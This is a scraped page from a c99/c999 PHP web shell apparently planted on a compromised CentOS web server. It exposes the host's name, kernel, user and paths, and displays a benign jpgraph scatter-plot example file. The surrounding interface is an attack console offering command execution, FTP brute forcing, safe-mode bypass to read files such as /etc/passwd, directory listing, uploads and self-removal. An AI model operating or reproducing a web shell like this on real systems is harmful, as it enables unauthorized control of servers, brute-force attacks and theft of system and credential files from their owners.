!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/jpgraph/docs/html/exframes/   drwxr-xr-x
Free 50.82 GB of 127.8 GB (39.76%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     scatter_csimex1.html (6.98 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include_once ("../jpgraph.php");
include_once (
"../jpgraph_scatter.php");

// Some data for the points
$datax = array(3.5,13.7,3,4,6.2,6,3.5,8,14,8,11.1,13.7);
$datay = array(10,22,12,13,17,20,16,19,30,31,40,43);

// A new scatter graph
$graph = new Graph(300,200,'auto');
$graph->SetShadow();
$graph->SetScale("linlin");

//$graph->img->SetMargin(40,40,40,40);        

$graph->title->Set("Scatter plot with Image Map");
$graph->title->SetFont(FF_FONT1,FS_BOLD);

// Client side image map targets
$targ=array("pie_csimex1.php#1","pie_csimex1.php#2","pie_csimex1.php#3",
"pie_csimex1.php#4","pie_csimex1.php#5","pie_csimex1.php#6",
"pie_csimex1.php#7","pie_csimex1.php#8","pie_csimex1.php#9" );

// Strings to put as "alts" (and "title" value)
$alts=array("val=%d","val=%d","val=%d","val=%d","val=%d","val=%d","val=%d","val=%d","val=%d");

// Create a new scatter plot
$sp1 = new ScatterPlot($datay,$datax);

// Use diamonds as markerss
$sp1->mark->SetType(MARK_DIAMOND);
$sp1->mark->SetWidth(10);

// Set the scatter plot image map targets
$sp1->SetCSIMTargets($targ,$alts);

// Add the plot
$graph->Add($sp1);

// Send back the HTML page which will call this script again
// to retrieve the image.
$graph->StrokeCSIM('scatter_csimex1.php');

?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0152 ]--